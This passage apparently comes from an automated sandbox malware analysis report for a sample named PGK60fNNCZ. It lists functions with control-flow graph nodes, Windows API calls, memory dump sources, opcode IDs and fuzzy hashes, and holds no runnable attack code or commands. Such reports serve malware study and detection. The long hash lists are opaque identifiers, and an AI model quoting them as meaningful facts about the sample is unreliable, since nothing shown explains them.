                                                            • Instruction ID: 9f4eaf9bfadd43ac7cb194e0bff666d971496bbc0ff45ae8841f2e8a1c6af7d4
                                                            • Opcode Fuzzy Hash: 6a9914b1b15deb4eab179f74fc6c34949769818b70357ce6b4cb2253217bc90e
                                                            • Instruction Fuzzy Hash: EF1189B9904398CEEB15CF65D5043EABBF4EB04314F54849EC188A3286C33DAA09CB65
                                                            Function 027C8974 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 875 27c8974-27ca8f8 877 27ca8fa-27ca8fd 875->877 878 27ca900-27ca92b GetModuleHandleW 875->878 877->878 879 27ca92d-27ca933 878->879 880 27ca934-27ca948 878->880 879->880
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,027CA6E4), ref: 027CA91E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1327014268.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_27c0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 9b347dd462feb67d36ca9b842db272faa34d444392734a9c69d004b8c0e72c06
                                                            • Instruction ID: 3ca846567579301021778cec5dfbcdfc266d6b115be1ed3bc4cb8d0987225f77
                                                            • Opcode Fuzzy Hash: 9b347dd462feb67d36ca9b842db272faa34d444392734a9c69d004b8c0e72c06
                                                            • Instruction Fuzzy Hash: 7411F3B5D007498BDB24DF9AD845A9EFBF4EB88315F11842ED819A7200C379A545CFA1
                                                            Function 027C91C8 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 882 27c91c8-27c9214 884 27c9216-27c923e KiUserCallbackDispatcher 882->884 885 27c9262-27c927b 882->885 886 27c9247-27c925b 884->886 887 27c9240-27c9246 884->887 886->885 887->886
                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 027C922D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1327014268.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_27c0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: 70c5782fc97f69d6237dc50e7a069304e223d4c0b24c686c36910dbbad4c9438
                                                            • Instruction ID: 445105d0d6297b4de5f66ea756bd42af34d2e299e2831e7284659695c29d8357
                                                            • Opcode Fuzzy Hash: 70c5782fc97f69d6237dc50e7a069304e223d4c0b24c686c36910dbbad4c9438
                                                            • Instruction Fuzzy Hash: E5119DB5804398CEEB14CFA5D5047EEBFF4EB05314F54809DD598A3241C37DAA04CBA5
                                                            Function 059B48A8 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 889 59b48a8-59b4910 894 59b4917-59b491d 889->894 917 59b4920 call 59b4ae8 894->917 918 59b4920 call 59b8288 894->918 919 59b4920 call 59b4aae 894->919 920 59b4920 call 59b4d13 894->920 921 59b4920 call 59b82b1 894->921 922 59b4920 call 59b7c10 894->922 923 59b4920 call 59b4eb0 894->923 924 59b4920 call 59b5e07 894->924 895 59b4926-59b4a9f call 59b46bc 917->895 918->895 919->895 920->895 921->895 922->895 923->895 924->895
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %*&/)(#$^@!~-_
                                                            • API String ID: 0-3325533558
                                                            • Opcode ID: c90ca2a1d8da322fa2f8b75e1d12fd4ac97947175e912f17c7c1be494dbcb04a
                                                            • Instruction ID: bdc61cb7d060026b893eaa77efcdc875d8a56a0e9e36e5019a87c4241b31420b
                                                            • Opcode Fuzzy Hash: c90ca2a1d8da322fa2f8b75e1d12fd4ac97947175e912f17c7c1be494dbcb04a
                                                            • Instruction Fuzzy Hash: 7251C231B042505BEB007F68E89679E7F72BF89300F14886CE9899F28ADE755909C7E5
                                                            Function 059B48B8 Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %*&/)(#$^@!~-_
                                                            • API String ID: 0-3325533558
                                                            • Opcode ID: 504e901113baa1584cafe64626bd0e57b36c71a751d49c66f8b3230a285dec42
                                                            • Instruction ID: 9f1404494a13743c10fcac942bb35da90e1c46ffec95c8eeb5d0c3b6ac1de9a0
                                                            • Opcode Fuzzy Hash: 504e901113baa1584cafe64626bd0e57b36c71a751d49c66f8b3230a285dec42
                                                            • Instruction Fuzzy Hash: CB41C431B042505BEB007F68E85679E7F62BF89300F14896CE9899F28ADE755D09C7E1
                                                            Function 059BE4B6 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: r
                                                            • API String ID: 0-1812594589
                                                            • Opcode ID: 885ba0d42b109db2303970a18fe4faf0758f9cae80bbaaa6c94c99aa363e8d2a
                                                            • Instruction ID: 9988356b37e61dd5bc236fe07ae9377923165a53aa9eb0ba877bd43b1a588b41
                                                            • Opcode Fuzzy Hash: 885ba0d42b109db2303970a18fe4faf0758f9cae80bbaaa6c94c99aa363e8d2a
                                                            • Instruction Fuzzy Hash: 6741587490A208CFFB04CFA9C2844EDBBBFFF4D301B14A955E41AA6251CBB49981CF61
                                                            Function 059BCB12 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Teq
                                                            • API String ID: 0-1098410595
                                                            • Opcode ID: 9b4dfc04c3c4dc4bdecba4414627da39ea78cf3319b27e93f740198f234d8260
                                                            • Instruction ID: 3ab6feeedbaee78a9150ad50ef2547235919640411439f952b6362e8c5df75ee
                                                            • Opcode Fuzzy Hash: 9b4dfc04c3c4dc4bdecba4414627da39ea78cf3319b27e93f740198f234d8260
                                                            • Instruction Fuzzy Hash: 5C415B74E052598FEB04CFAACA446EEBBF7BF89300F10942AE409AB354DB745905CB50
                                                            Function 059BCB20 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Teq
                                                            • API String ID: 0-1098410595
                                                            • Opcode ID: 90e66df444946c37c072b0b66c3e85b937ccf95d025fc8a0e028323f0c24f359
                                                            • Instruction ID: bd1abb6441ad5f139366c714b7c12b840877da22e3c68c96f186828b9b8157f6
                                                            • Opcode Fuzzy Hash: 90e66df444946c37c072b0b66c3e85b937ccf95d025fc8a0e028323f0c24f359
                                                            • Instruction Fuzzy Hash: CB411A74E052598BEB04CFAAD6446EEFBFBBF89300F109429E409AB354DBB45905CF50
                                                            Function 059B5E41 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8q
                                                            • API String ID: 0-4083045702
                                                            • Opcode ID: 73cc175bad861e719b92c5d9bf05fdb99701f30fd4edee13df055983797ad32d
                                                            • Instruction ID: 48df38f07ae6dab9060814153af5957a4145cfac72cf75b56531003bce79efae
                                                            • Opcode Fuzzy Hash: 73cc175bad861e719b92c5d9bf05fdb99701f30fd4edee13df055983797ad32d
                                                            • Instruction Fuzzy Hash: 2231DE31A04204DBF714CB58DA09BBDBBB6FB84305F15486AE005AB391F7B58941CB91
                                                            Function 059B4D66 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: j
                                                            • API String ID: 0-2137352139
                                                            • Opcode ID: 300ae6b404e87a090cd41e18ddefc921155d46cea8dc9289ff243218974a9490
                                                            • Instruction ID: fafe1360e0e90808ded0e72e66950ff60b2e0f32636ef12dea72bca970c2f1ca
                                                            • Opcode Fuzzy Hash: 300ae6b404e87a090cd41e18ddefc921155d46cea8dc9289ff243218974a9490
                                                            • Instruction Fuzzy Hash: 36218231608614CAFF218B68CA51AF9B767BFC2711F048567E49E8E293D3B5E881E315
                                                            Function 059BCBA6 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Teq
                                                            • API String ID: 0-1098410595
                                                            • Opcode ID: bc23ac0abdd5a4e42801f1b8a55ce0c0aaea1b0300b4349d2f6804f798e2a4c9
                                                            • Instruction ID: 886b62f261668f8bba2662b1178189c77a1d73fd5af8bdff3019604f87a4754d
                                                            • Opcode Fuzzy Hash: bc23ac0abdd5a4e42801f1b8a55ce0c0aaea1b0300b4349d2f6804f798e2a4c9
                                                            • Instruction Fuzzy Hash: E231A274E042198FDB04CFE8C5849EDFBB6FF88301F10852AE919AB355C7716906CB50
                                                            Function 059B4EB0 Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $q
                                                            • API String ID: 0-1301096350
                                                            • Opcode ID: b34bf6ab0bb56c6e27ee0bd8e2f0d1bf6b2898e30d44ecef020bcd097a830491
                                                            • Instruction ID: 0f4bb0a9ff2870c9fd0be133e622662cf5639acb362bd640f335e368dcb09a66
                                                            • Opcode Fuzzy Hash: b34bf6ab0bb56c6e27ee0bd8e2f0d1bf6b2898e30d44ecef020bcd097a830491
                                                            • Instruction Fuzzy Hash: 7FD012B261D7818EFF324634AE245913B3ABA1316A70B01D3D045CA2E7F753C815D726
                                                            Function 059B14A8 Relevance: .5, Instructions: 523COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 63cb5550d4ba55c2264acb6b6a9ba4521e019d8042853d50ad169940d264d84f
                                                            • Instruction ID: 3c2924e662227485518d39650f6480174c5c16dbd4bc65d4f8636d0d58f017c7
                                                            • Opcode Fuzzy Hash: 63cb5550d4ba55c2264acb6b6a9ba4521e019d8042853d50ad169940d264d84f
                                                            • Instruction Fuzzy Hash: 26420230D00619CFDF14EFA8C9946ECBBB1BF49300F118699D5497B264EB70AA98CB81
                                                            Function 059B1499 Relevance: .5, Instructions: 519COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a02cc00e202a1f4aa11a43dee37239843eebb19f8e72064386a236daa943e208
                                                            • Instruction ID: 3baf67db79880f43c251173ead71d7550ccc94b5a2b54dd455f41a33cc9d1bad
                                                            • Opcode Fuzzy Hash: a02cc00e202a1f4aa11a43dee37239843eebb19f8e72064386a236daa943e208
                                                            • Instruction Fuzzy Hash: 5C420330D04619CFEF15EFA8C9586ECBBB1BF49300F118699D5497B264EB709A98CF81
                                                            Function 059B88E8 Relevance: .3, Instructions: 258COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 768621ed6e5ac4d3c1c161095739ec20e45e1a3a844bfb07119172b9f8b6f4d8
                                                            • Instruction ID: 1dfee8d93a2425365ea96c259d579d1d8aca049ee64fd1db785b48124f187582
                                                            • Opcode Fuzzy Hash: 768621ed6e5ac4d3c1c161095739ec20e45e1a3a844bfb07119172b9f8b6f4d8
                                                            • Instruction Fuzzy Hash: B0A16C71B012049FEB15DB68D694BADB7FBBF89300F2540A9E506AB3A1CB71ED01CB51
                                                            Function 059B0F00 Relevance: .2, Instructions: 207COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e8ab09ff08a41323e776d7761e7babb7024e1bdce34ab38ed98a23b594de79f0
                                                            • Instruction ID: 50ca3e47b1d6af06745b1b2d7418db9a92dc09cc2022aaa9ba2fe31caa10d6de
                                                            • Opcode Fuzzy Hash: e8ab09ff08a41323e776d7761e7babb7024e1bdce34ab38ed98a23b594de79f0
                                                            • Instruction Fuzzy Hash: 6F81A430A14209DFFB11DFA8DA987EDBBB5FF45300F11446AD046AB2A4EBB0D955CB81
                                                            Function 059B7C38 Relevance: .2, Instructions: 204COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a087b91e16d47d5549f19ba20792b91511d6277622b2c0e85edfef3a00eb4653
                                                            • Instruction ID: b19a1a81ee128bf80c91d3b1f6953ee21868ad6d58e821bab7d39de17e9764f2
                                                            • Opcode Fuzzy Hash: a087b91e16d47d5549f19ba20792b91511d6277622b2c0e85edfef3a00eb4653
                                                            • Instruction Fuzzy Hash: 0B815B30A00219DFEB14CFE5C584AEDBBF2FF84300F14866AE455AB395DB75A942CB51
                                                            Function 059B73C0 Relevance: .2, Instructions: 187COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 02e3ed4030efa781126874582a66af5e250c69593186d3b4922e4f396b648e28
                                                            • Instruction ID: d7bb4b34f964213df5d4f5853aabbf28c3e26ee50283e6dc98839b189392d980
                                                            • Opcode Fuzzy Hash: 02e3ed4030efa781126874582a66af5e250c69593186d3b4922e4f396b648e28
                                                            • Instruction Fuzzy Hash: F1618470F002049FFB14DBE9D941BAEBBB2FFC4701F14866AE945AB381DA749902C791
                                                            Function 059B73B0 Relevance: .2, Instructions: 180COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d0be88b951903bfb2ca49091e82a1575880a47478c0521a192019ce2b558ed1c
                                                            • Instruction ID: ceff43cfdbadacb4a1f8511caefa6df78f52628adbecd91d8370e02e68b25f1f
                                                            • Opcode Fuzzy Hash: d0be88b951903bfb2ca49091e82a1575880a47478c0521a192019ce2b558ed1c
                                                            • Instruction Fuzzy Hash: F161A431F00208DFFB14DBE9D941BAEB6B2FFC4701F148629E945AB385DA709902CB91
                                                            Function 059B6904 Relevance: .1, Instructions: 139COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a9ce9692f6f0695c94b7c5f59399b4485319ecbe63c1de213dc58c0e9e1be0da
                                                            • Instruction ID: ad9203d8bd1cb348da8c84e164d2bfb30e2ba3be5ec0af5106d9703ba74c6206
                                                            • Opcode Fuzzy Hash: a9ce9692f6f0695c94b7c5f59399b4485319ecbe63c1de213dc58c0e9e1be0da
                                                            • Instruction Fuzzy Hash: D4518271B04219DFFF10CF68CA55AFEBBB6BF44704F108526E542AB291C7B0E8418B91
                                                            Function 059BD318 Relevance: .1, Instructions: 128COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a25e86ce1ccb064c8bad295d093235acdc40e88bcaa0c64bbcb77d41be191f36
                                                            • Instruction ID: c9cc33855922d911cd03783e120234549a4a14def43097afeef7995cd18f2c22
                                                            • Opcode Fuzzy Hash: a25e86ce1ccb064c8bad295d093235acdc40e88bcaa0c64bbcb77d41be191f36
                                                            • Instruction Fuzzy Hash: 5D410774E09309CBEB04CFA9C6406EEBBFBFB89300F14E52AD419A7292D7745941CB64
                                                            Function 059B029C Relevance: .1, Instructions: 124COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7393b0551312a58c8cb579731c6f3e58e4a39857bf3c84e9453ff89d260b0c04
                                                            • Instruction ID: 52e6ce17f61298f09a361e554a44f5c58dc4af04d94f6a52a1310bb329481cef
                                                            • Opcode Fuzzy Hash: 7393b0551312a58c8cb579731c6f3e58e4a39857bf3c84e9453ff89d260b0c04
                                                            • Instruction Fuzzy Hash: 54418470E142169FFF05EFA9CA6C6EA7BB6BB44340F10492AD406F7254E6B4D910DB80
                                                            Function 059B1178 Relevance: .1, Instructions: 124COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c46629e34a94451cca604b7dc6f8d59722f27e8829ceb02bd5da7d1e670c912e
                                                            • Instruction ID: 876ef36ace0b90259a196edd409ad5e532baaa7975096302eecea684f4f1d6d7
                                                            • Opcode Fuzzy Hash: c46629e34a94451cca604b7dc6f8d59722f27e8829ceb02bd5da7d1e670c912e
                                                            • Instruction Fuzzy Hash: DF41C870E082169FFF05EF65CB6D6E97BB2BB45340F104966D402F7255E6B48920DB90
                                                            Function 059B0290 Relevance: .1, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 36e433cc4e0d88518be2317e7aa5e644df61292b835222aca14289fbaeaf28fd
                                                            • Instruction ID: bddc541e83c8b3b16c83db8ddf320b01cb3f5a9164da85b2d272d30e665f7f9d
                                                            • Opcode Fuzzy Hash: 36e433cc4e0d88518be2317e7aa5e644df61292b835222aca14289fbaeaf28fd
                                                            • Instruction Fuzzy Hash: 4A41C570E042169FFF01EFA5CB686FA7BB6BB44340F104926D402F7254E6B08910DB90
                                                            Function 059B68FA Relevance: .1, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10ddad62422b434483120159c1bd821ebffc51ea153a5cb37f78fe184fa6b844
                                                            • Instruction ID: 59c786d063f5e00ee60235a6635d1699e9d8a70f659c2388fb678d5542e67c8b
                                                            • Opcode Fuzzy Hash: 10ddad62422b434483120159c1bd821ebffc51ea153a5cb37f78fe184fa6b844
                                                            • Instruction Fuzzy Hash: 15417C71B04219DFFF00CF98CA45AFEBBB6BF44B05F108526E542AA291C7B4E941CB91
                                                            Function 059B4AAE Relevance: .1, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52189fbd711c8eb098da3a54c6834979157d4abf9de35c77f552616a4da4c3ce
                                                            • Instruction ID: 8f05f059b6e144d2d2449f9a6d0335826f55d3686e46afd61ba8737e67d822f5
                                                            • Opcode Fuzzy Hash: 52189fbd711c8eb098da3a54c6834979157d4abf9de35c77f552616a4da4c3ce
                                                            • Instruction Fuzzy Hash: 964106726483508FFB118B34C9282A87BBAFF42619B1980EBE44ACB393D7798C05C755
                                                            Function 059B6B40 Relevance: .1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4601def0b655538fdd2620f6d4349f8ebbc2131af6b843e254358c09548a16e1
                                                            • Instruction ID: 49c132958664e5468872e47d6a30f7a7054a4978758da477c40e61f34ff80855
                                                            • Opcode Fuzzy Hash: 4601def0b655538fdd2620f6d4349f8ebbc2131af6b843e254358c09548a16e1
                                                            • Instruction Fuzzy Hash: 19417E31A08625CBFB10CB69CB412FAB7BAFF45700F04897AE566C6291D3B8E940C716
                                                            Function 059B4AE8 Relevance: .1, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 62e84efbea6f157c5637badefc58f4a7f5e55eb8e2bcdb5a59c54fc500b83567
                                                            • Instruction ID: e0045bedeabc758c7c5db0a55795b8e99aa58e98db867bd9b693927e5e66b7b8
                                                            • Opcode Fuzzy Hash: 62e84efbea6f157c5637badefc58f4a7f5e55eb8e2bcdb5a59c54fc500b83567
                                                            • Instruction Fuzzy Hash: 8531E671B00224CFFB148B78D9286AD77FBFB84615B1485AAE40AC7346DB75CC01CB55
                                                            Function 059B6D28 Relevance: .1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e108f493327ca52246f04442f0d09ab65c6320accd5120cb91eaf9179c87c18e
                                                            • Instruction ID: 5e4db7611cf7bd58c2700880af8161978d20c918e8911ce7646afbd243ebae0f
                                                            • Opcode Fuzzy Hash: e108f493327ca52246f04442f0d09ab65c6320accd5120cb91eaf9179c87c18e
                                                            • Instruction Fuzzy Hash: A3314972900208AFDF14DFA9D845ADEBFF9EB48310F10842AE509E7350D775A955CFA0
                                                            Function 059B7AA8 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 770d0adb3afe20679483b13132d9a96f6850df31c9085f2316d28d6b431a37f2
                                                            • Instruction ID: 7653c3062a12cc4827cedf23cdf1e0fa7ecd537a50a2f5b11e0210a765fd411c
                                                            • Opcode Fuzzy Hash: 770d0adb3afe20679483b13132d9a96f6850df31c9085f2316d28d6b431a37f2
                                                            • Instruction Fuzzy Hash: 93318570A08625DFF7508BB8CA006FAB7B9FB84354F148A2AA466C7281E2B4D950CB51
                                                            Function 059B8300 Relevance: .1, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1339790006.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_59b0000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
